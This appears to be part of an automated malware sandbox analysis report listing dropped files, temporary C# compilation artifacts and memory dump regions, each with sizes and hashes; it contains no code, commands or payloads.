053104baea0e59d4ad18c08ed3d33c0e83691203dcfa17b4d03fe5a0d15dc4d8fde2fa782721567326ee72d1944b0924bffe0fdc4881dc78a7daedbe617f59c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Desktop\CopyRedo.docx

Filesize
17KB

MD5
ced39767bea0056b9e65a1cab2ffb593

SHA1
ce3debd0f9624067da1a0b8974fdca8493377508

SHA256
ffdd666236cf77dd20449e1ba145b0a7d83345cee09676927853e0654d35e0dd

SHA512
8bb631fa6fac0b8bd19fd270886d8b60bbf113895938f7be37aaf3c4db34e1032199f4526308cfcc61945f838638e4b770c262a0bd5802e4125381fca72e0402

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Desktop\GrantCheckpoint.docx

Filesize
18KB

MD5
349b14b2585bd5b4ee631dcc4de01d36

SHA1
b7bb5ce839b183b8b1f5e030e9ee1dc55f65c8f5

SHA256
6d415b350346497d1dd8cd1a1276a1ce40425f1bd96198025dff2ff7533145c0

SHA512
c4f6259ec81dc7dd0b554bf5b48571f98625974f3ab0a68b328bf381c65bb3f0e295760123c1007e33e05950d5ff0b2dcd5d2f98dbd02786638f86fa149eb7b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Desktop\SkipRestore.xlsx

Filesize
186KB

MD5
4ffc909bb7894b4722427d46ef73818f

SHA1
a872c2a50da96f23989b3195f1b8eedff4c97fb8

SHA256
d54b2d7c87863b8a80d37fb03ca035114835e0b859e308861682c831c71ddc33

SHA512
676c20a75db6361dfaacea83d53c6fe203f4740de3c859e78b60751ff91cd88c59bdb7be85e63f77e97a42a76f8c5dacd279951a6734096c40ea716f2fc72b88

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Desktop\SuspendTrace.jpg

Filesize
263KB

MD5
39503cb77966e8ee5328ef96d599ba1e

SHA1
3ba8bb9e33c26b1bad3ce07c58a3a8800b58d88f

SHA256
609cc9c9f0c8308067df93bf30603e0238fa4898f4812d15d3b4bb531ff349eb

SHA512
a0fbbe56ba77c1fe60f9619eb5db7877b3b4f4125096f278f7b7b33b332cb14b34e5be6f6fbc9afc8b0dd64178b8f45012aa81775ae35b70197d76de2801bfdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Desktop\TraceSubmit.docx

Filesize
372KB

MD5
b40960477863a575c6c71162bdc5723b

SHA1
a0c69559339052994437460fc1198c0af96b5dcc

SHA256
9f5c05313fb3a206126330245a65b0454b5b6a04d41377e7d2c23c70ea31bf08

SHA512
495b766c812066a400b6917f9603f166be0d39478b6c7c03930878b29b4e426fdd1b0b9c7722ca64d94c10da193cd39fcf2574ba7b38dd68d0322b6aa5747024

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Desktop\UnblockResume.docx

Filesize
16KB

MD5
2e140686d10ab2f8b3ade47eb50138e5

SHA1
21c73f06b7ca008a24c78ac8d66d3f23fc5ad6c5

SHA256
d17e9deb74546b5d0dd94b59137557007b6a2b2c3bb43eb8def9aaa9d875b36a

SHA512
489e3d372b78b722e9b759dc6888b0275c53cb3de32663ea5fb312ab8602ad4438d4ab88c77dd44fd053b45ad57dd3ccb24524fefbd2bd89cbcadb30161035eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Desktop\UnlockDebug.docx

Filesize
12KB

MD5
6c516bfa69923492c54e12c33583c1ba

SHA1
fe7d489e5fc351d57f6e3ca60347f5945ac7fdf3

SHA256
2da68d141d75fce375205f146622843a7a69672f959e3265ab67f8c0955172d7

SHA512
b7cecb05a043e2ca030b1227f62b81165e23395f498c757900a305f5a91f78f92bee883fc80ec3e0415b05df2b55d16949225719e1d22b382b1401ebd448eed6

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Documents\BackupCompress.xls

Filesize
179KB

MD5
675908e476a6f426ffd233d273ba12fe

SHA1
b0de2a35d7a8b7240d55da17e2a5040852703e6c

SHA256
9db9bde8c358d5b5262bcff7ec104e2dcadb7889e7b149cfd314ec26a3698f3d

SHA512
0d152780353751ad955340d55bddc7b794c45a3c387622e2b7c8460613a33ed4bb1bed4eecd57ffdf4f85f762da039c29a88e941703ef6c7115827897d284dfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Documents\CompleteInstall.txt

Filesize
325KB

MD5
d9fc8a59673c00106c7bccb20c0f0944

SHA1
f9ff52dd7855de5ad9823a920973bfeeb04c1dfe

SHA256
d63cfd15fa2f6ecfb3cac8ad25d8ef3a250f37c4411dfc64d1ce0dee0ca3b8ed

SHA512
232790b2c684f977752d19b23bd8cee940fbc3864d5ae9d3fb9731f6da8b88aedf7d3ce85a54906c2333bfc54a948c3561a02aebc450bcfc8484b770401bc80f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Documents\ConvertConvertFrom.docx

Filesize
12KB

MD5
4b35b4e18dc41e452c9ac55a9f4854d1

SHA1
41722d5faee89a9e85e842ff861f06ad68ff4e48

SHA256
b04f20f2fff45dc53ee42003ad2698b7aaa14b84126f801909c006fdd77fd1cd

SHA512
880d086823327525bca4ba18f7d2a826836042d022a783a2075414f42203b2c2a1ba3f1747cbdd5aa9c9e203e1ce013b3e2d73543cdd1d071d17c3dddfeecf10

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Documents\DismountInvoke.xls

Filesize
481KB

MD5
3c1147ac5f2ddf43dbdc70c498a9bce2

SHA1
d1892571eeec9a8eec492d131a3afc1351629293

SHA256
494d9c795b3f97c0b2acfa9dabb064170e01faf22b7ec185a88795b138bc7f3c

SHA512
d95c354fde599e69a82437e77cad1ae5bc7e839d5cd59d908a7a4155c83b6b8c66daba202c4342c94a61e58870e864697cedda3b03454ab82495c743f2735e74

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Documents\LimitUnlock.txt

Filesize
228KB

MD5
ae7236161b19b3e819559ce533ce935a

SHA1
1c61c10e5b03a87c1f27c0a712ef19709f099809

SHA256
ede2f0c26ecc6272a8cbd93fe1cdbfc8c88baad8d1a6252e940f7d3b537eab37

SHA512
d7475994957c51a802fe5cb67eb8f804959b43517f60d8aa63e82dc581171e9e059e961fd3191d9c2d493582d996f50085a68c37b6427fc1c84400a8d058a711

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‍ ‌ \Common Files\Documents\OpenInvoke.xls

Filesize
257KB

MD5
1bac0e978f4099d9885fc29c89a88fcb

SHA1
594b881d8ca5446ef40cc89e7dd19d8350bb057f

SHA256
28f314df69b755f7cf30aa95f085a7d4d368aa8c54a8a57d4ba123b8b1969d60

SHA512
c99bfb01b61c0ef1f9ce5b100bddb71e35cbff29c5c8c2ed9958651710de73d6346fca13c05cf3f7beaf21c75dc89f11ea81ab5ad84ec3698f57194ec0e923dc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dv4osi4y\CSC1F699A443D1E43F0A634F7EE68746BDD.TMP

Filesize
652B

MD5
0df002779ab215bfa762c27ca069d36f

SHA1
78a8ab78c74e4236a7f33184cbbb1a5fc001305d

SHA256
092ce978d6f069b5b0abc91774e70deed350dc31957bd9c6ee9479b800b2ff1f

SHA512
eeb44181ba77b14d1567905541963749ccb1774efa667afe80cac71919c8b9ceb82e079158f8cf60a0f35326b29f04858d6578460af869b750d3c3efbf621d26

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dv4osi4y\dv4osi4y.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dv4osi4y\dv4osi4y.cmdline

Filesize
607B

MD5
d84f7c2a7a5bf03161de8ac83d0af342

SHA1
436f1c0c06a46563f6ce3f9664cf3a35a217f6cc

SHA256
2aa0e71f604f634fff885da0b40e78637a0120efc2ee0a443c4d87f3985abd79

SHA512
40377a71a6f8d54e4aa2be65e21b0b50e79e0e8a12e34887d2fe36f5f9330a8f4b131982995c3a38e28c36424d1b8a37419a22cf5dbc8e847cdf1435a7781ad4

Download Submit
memory/4768-212-0x000001939E390000-0x000001939E398000-memory.dmp

Filesize
32KB

Download
memory/4876-88-0x000001CCB3790000-0x000001CCB37B2000-memory.dmp

Filesize
136KB

Download
memory/4940-30-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp

Filesize
144KB

Download
memory/4940-109-0x00007FFBDA6A0000-0x00007FFBDA6B9000-memory.dmp

Filesize
100KB

Download
memory/4940-108-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp

Filesize
1.4MB

Download
memory/4940-102-0x00007FFBD5920000-0x00007FFBD5943000-memory.dmp

Filesize
140KB

Download
memory/4940-78-0x00007FFBD8440000-0x00007FFBD846D000-memory.dmp

Filesize
180KB

Download
memory/4940-79-0x00007FFBD5880000-0x00007FFBD588D000-memory.dmp

Filesize
52KB

Download
memory/4940-216-0x00007FFBD4E20000-0x00007FFBD4E4E000-memory.dmp

Filesize
184KB

Download
memory/4940-81-0x00007FFBD4A10000-0x00007FFBD4B2C000-memory.dmp

Filesize
1.1MB

Download
memory/4940-274-0x00007FFBD4C40000-0x00007FFBD4CF8000-memory.dmp

Filesize
736KB

Download
memory/4940-275-0x000001768CC80000-0x000001768CFF5000-memory.dmp

Filesize
3.5MB

Download
memory/4940-76-0x00007FFBD8370000-0x00007FFBD8384000-memory.dmp

Filesize
80KB

Download
memory/4940-278-0x00007FFBC5290000-0x00007FFBC5605000-memory.dmp

Filesize
3.5MB

Download
memory/4940-71-0x00007FFBD4C40000-0x00007FFBD4CF8000-memory.dmp

Filesize
736KB

Download
memory/4940-73-0x00007FFBC5290000-0x00007FFBC5605000-memory.dmp

Filesize
3.5MB

Download
memory/4940-74-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp

Filesize
144KB

Download
memory/4940-72-0x000001768CC80000-0x000001768CFF5000-memory.dmp

Filesize
3.5MB

Download
memory/4940-70-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp

Filesize
5.9MB

Download
memory/4940-66-0x00007FFBD4E20000-0x00007FFBD4E4E000-memory.dmp

Filesize
184KB

Download
memory/4940-64-0x00007FFBD8410000-0x00007FFBD841D000-memory.dmp

Filesize
52KB

Download
memory/4940-62-0x00007FFBDA6A0000-0x00007FFBDA6B9000-memory.dmp

Filesize
100KB

Download
memory/4940-60-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp

Filesize
1.4MB

Download
memory/4940-58-0x00007FFBD5920000-0x00007FFBD5943000-memory.dmp

Filesize
140KB

Download
memory/4940-56-0x00007FFBDC260000-0x00007FFBDC279000-memory.dmp

Filesize
100KB

Download
memory/4940-54-0x00007FFBD8440000-0x00007FFBD846D000-memory.dmp

Filesize
180KB

Download
memory/4940-32-0x00007FFBDD460000-0x00007FFBDD46F000-memory.dmp

Filesize
60KB

Download
memory/4940-25-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp

Filesize
5.9MB

Download
memory/4940-303-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp

Filesize
1.4MB

Download
memory/4940-311-0x00007FFBD4A10000-0x00007FFBD4B2C000-memory.dmp

Filesize
1.1MB

Download
memory/4940-297-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp

Filesize
5.9MB

Download
memory/4940-298-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp

Filesize
144KB

Download
memory/4940-332-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp

Filesize
5.9MB

Download
memory/4940-347-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp

Filesize
5.9MB

Download
memory/4940-372-0x00007FFBD4C40000-0x00007FFBD4CF8000-memory.dmp

Filesize
736KB

Download
memory/4940-371-0x00007FFBD4E20000-0x00007FFBD4E4E000-memory.dmp

Filesize
184KB

Download
memory/4940-370-0x00007FFBD8410000-0x00007FFBD841D000-memory.dmp

Filesize
52KB

Download
memory/4940-369-0x00007FFBDA6A0000-0x00007FFBDA6B9000-memory.dmp

Filesize
100KB

Download
memory/4940-368-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp

Filesize
1.4MB

Download
memory/4940-367-0x00007FFBD5920000-0x00007FFBD5943000-memory.dmp

Filesize
140KB

Download
memory/4940-366-0x00007FFBDC260000-0x00007FFBDC279000-memory.dmp

Filesize
100KB

Download
memory/4940-365-0x00007FFBD8440000-0x00007FFBD846D000-memory.dmp

Filesize
180KB

Download
memory/4940-364-0x00007FFBDD460000-0x00007FFBDD46F000-memory.dmp

Filesize
60KB

Download
memory/4940-363-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp

Filesize
144KB

Download
memory/4940-362-0x00007FFBC5290000-0x00007FFBC5605000-memory.dmp

Filesize
3.5MB

Download
memory/4940-361-0x00007FFBD4A10000-0x00007FFBD4B2C000-memory.dmp

Filesize
1.1MB

Download
memory/4940-360-0x00007FFBD5880000-0x00007FFBD588D000-memory.dmp

Filesize
52KB

Download
memory/4940-359-0x00007FFBD8370000-0x00007FFBD8384000-memory.dmp

Filesize
80KB

Download